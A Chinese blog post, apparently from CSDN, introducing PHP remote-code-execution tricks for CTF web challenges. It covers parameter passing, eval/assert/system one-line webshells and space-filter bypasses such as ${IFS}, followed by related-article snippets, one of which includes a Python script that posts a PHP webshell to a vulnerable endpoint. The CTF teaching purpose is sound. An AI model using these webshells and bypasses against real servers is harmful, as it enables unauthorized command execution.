CTF php RCE (一)

最新推荐文章于 2025-03-27 16:18:18 发布
原创 最新推荐文章于 2025-03-27 16:18:18 发布 · 628 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #web安全 #经验分享

0x01 引言

首先进入题目 应该是大部分都是一段白盒PHP审计,然后我们为了命令执行,绕过或者是钻空子等等操作,来拿到flag

0x02 基础

0x01 传参方式

这里有两个工具,hackbar和burpsuite,这两个工具非常实用
在这里插入图片描述
在这里插入图片描述
大家可以自己Google或者百度搜索安装,安装包的话,私信我可以给你哦
常见的就是GET和POST传参

通俗点讲的话GET 传参就是在url(链接后面拼接键值对)

键值对我也讲不明白
就是c=1 这里的 c 是键,1 是值

例子

url/?c=echo `ls /`;

POST 的话我们就要打开post传参方式
在这里插入图片描述
在BP中我们右键,然后选择change request method即可进行切换

在这里插入图片描述
这里的特点是hackbar的POST不能直接传值,只能传键值对,bp可以直接传值
而且有时候如果你使用hackbar进行传参的话没有反应(就是没有传上去的感觉payload没有改变),那么我建议你进行url编码,如果还没有反应那么再编

0x02 常用函数和命令

首先最常用的应该是弹了吧,好吧也不是那么的常用,但是在比较方便的场面我觉得还是相当好用的,可以看我写的那篇弹shellblog,看看基础命令

函数

在这里插入图片描述
其实我在很多博客中看到说不算function,但是我觉得吧,还行,反正就是命令执行的简介吧,你一看到eval你就知道这题是RCE,主要就是写🐎常用

assert()
有些版本比如7.0,
直接写<?php  ?>并不好使,或者说被禁用了php那么可以这么写🐎
我们需要调用eval拼接为assert(eval($_POST[a]))

system
passthru
这两个函数相当常用
system('ls /');
system("ls /");
这二者有时候可能结果一样,但是其内涵不同,而且有时候单引号能触发,但是双引号不一定能触发,所以多多尝试

php -r 'echo `ls`;'
开启php引擎,进行命令执行

这几种都会使用到分号 ,
所以也出现了include包含来面对这种东西

include$_GET["cmd"]?>
include$_POST["cmd"]?>
然后cmd传日志文件传马或者是php伪协议外带文件内容

?><?=`ls` 等同于system

0x03 空格绕过

%09(tab)
${IFS}
$IFS$1
${IFS}$1       //这后面的数字随便0-9都可以只是
%09 (空格)
%0a     (回车)
\x20     (空格)
<>
<
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 7945
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
RCE远程命令执行web经典题型解答
shatianyzg的博客
08-14 381
输入127.0.0.1 & cd flag_is_here;cat flag_138811873632297.php,找到flag。输入127.0.0.1%0als#,这里%0a在linux 代表空格,url编码,需要在浏览器中输入。读取到段字符串,去进行base64解码,在burpsuite中解码。输入127.0.0.1;,空格,cat,flag,ctfhub。将cat换成more命令,再查看源代码,找到flag。输入127.0.0.1;用 cat /flag_20052查到flag。...
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 2525
只是总结些常见的姿势,大佬轻喷。
CTF中tricks集合
as you know, nlp is fantasitc!
09-26 485
这种情况很可能是禁止用伪协议中的base64编码,如下例子。这种情况下可以采取其他的编码方式进行读取。
萌新小白对于ctf学习的笔记--CTF中的RCE
黑战士的博客
03-08 1617
以上就是我对于RCE学习的个总结,其中也借鉴了很多网上大佬们的文章,也有视频学习的笔记。如果有不足,会很快改的。
CTFphp相关考点
meteox的博客
08-07 2626
以前在做CTF题的时候总是会遇到些用php的trick才能过的题,知识点还是很杂的,主要是php这种动态弱类型语言实在是太灵活,各种奇葩写法也多,把之前的知识总结下。 学长的博客有对php黑魔法进行了些总结,我在此基础上进行拓展 https://skysec.top/2017/07/22/PHP%E5%87%BD%E6%95%B0%E9%BB%91%E9%AD%94%E6%B3%95%E5%B0%8F%E6%80%BB%E7%BB%93/#%E9%BB%91%E9%AD%94%E6%B3%95%E5%A
浅谈CTF中各种花式绕过的小trick
ph0ebus的博客
02-23 5916
在代码审计的时候,我们不难发现很多很多的函数需要我们bypass,这些知识点很多又很小,基本上是眼就明白,但是下次遇见又不太清晰,需要反反复复查找,这篇文章浅浅做个汇总,如有不足,欢迎补充。
CTF题目phpRCE的简单的思考
weixin_46263525的博客
07-16 1218
eval() 函数可以接受个字符串作为参数,该字符串包含了 PHP 代码,并且会在运行时将这段代码解析执行。
CTFhub RCE靶场
qq_64703089的博客
08-06 672
通过管道符,可以将个命令的标准输出管理为另外个命令的标准输入,当它失败后,会执行另外条命令。修改发送方法为post,目标修改为/?观察phpinfo得出需要用php://input。发现 flag_8051660913375.php。遂构造php://input发现行不通,所以用php://filter。发现有个php文件,cat下。发现 flag_is_here。
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
CTFHub技能树webRCE
wzhwzh123321的博客
02-18 870
根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了个名为cmd的变量的值(是否非空),eval是将串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求,file为php://input使得POST参数可以作为原始请求的数据,使用bp抓包,即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串,意思是如果file的前六个字符为php://,那么就会包含file文件。
胡乱自学黑客的,能骂醒个算
2401_84208172的博客
05-05 1124
为啥说胡乱自学黑客的,能骂醒个算个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
ctf打靶练习之rce
最新发布
m0_67170526的博客
03-27 1176
看见eval+request,直接蚁剑然后遍历目录。
ctfshow每周大挑战之RCE极限挑战
xnxqwzy的博客
08-21 755
php的eval()解释:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。return 语句会立即终止对字符串的计算。返回值:除非在代码字符串中调用 return 语句,则返回传给 return 语句的值,否则返回 NULL。如果代码字符串中存在解析错误,则 eval()函数返回 FALSE。
SWPUCTF 2021 新生赛 RCE题目
m0_74160536的博客
05-26 890
查看代码,这段 PHP 代码接受个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
CTFWEB题——RCE
tomyyyyy
10-31 6970
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF中常见注入题源码及脚本分析
weixin_30659829的博客
07-30 569
1.代码审计发现 这里没有用escape_string,因此存在注入。 1 function show($username){ 2 global $conn; 3 $sql = "select role from `user` where username ='".$username."'"; 4 $res = $conn ->query($sql); ...
ctfrce
03-11
### CTF竞赛中RCE(远程代码执行)攻击与防御技术 #### 攻击方法 在CTF竞赛场景下,利用远程代码执行(RCE)漏洞进行攻击主要依赖于发现并利用应用程序中存在的未充分验证用户输入的功能。当应用程序允许用户提交的数据被直接用于构建命令或脚本时,则可能存在RCE风险[^4]。 对于基于PHP的应用程序而言,如果存在`php://input`这样的伪协议滥用情况,那么攻击者可以通过精心构造HTTP请求体来实现恶意代码的上传与执行[^3]。此外,某些内置函数如`eval()`也会成为潜在的风险点,因为它会尝试解析传入字符串作为实际可运行的PHP代码片段。 为了成功实施次有效的RCE攻击,在比赛中选手们往往会关注以下几个方面: - **寻找易受攻击的服务接口**:任何接受来自客户端数据的地方都可能是突破口。 - **绕过现有防护措施**:比如通过编码变换等方式规避简单字符过滤机制[^2]。 - **测试不同环境下的行为差异**:考虑到多平台兼容性问题可能导致的安全隐患。 ```python import requests url = 'http://example.com/vulnerable_endpoint' payload = '<?php system($_GET["cmd"]); ?>' response = requests.post(url, data=payload) print(response.text) ``` 这段Python代码展示了如何发送POST请求给个假设存在的脆弱端点,并试图植入段简单的PHP shell以供后续交互使用。 #### 防御策略 面对如此危险性的威胁,采取适当预防手段至关重要。以下是几种常见的防范建议: - **最小权限原则**:确保Web应用及其组件仅拥有完成必要任务所需的最低限度资源访问权。 - **严格输入校验**:无论是前端还是后端都应该对所有外部输入进行全面而细致地审查,拒绝非法格式的内容传递到内部处理逻辑之前[^1]。 - **采用安全框架/库**:现代开发工具包往往已经集成了许多经过良好设计的安全特性,可以帮助开发者更轻松地抵御已知类型的攻击模式。 - **定期更新补丁**:保持软件版本处于最新状态有助于及时修复官方发布的各类安全隐患报告所指出的问题。 ```bash sudo apt-get update && sudo apt-get upgrade -y ``` 上述Shell指令可用于Linux系统上自动化安装最新的安全更新包集合。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值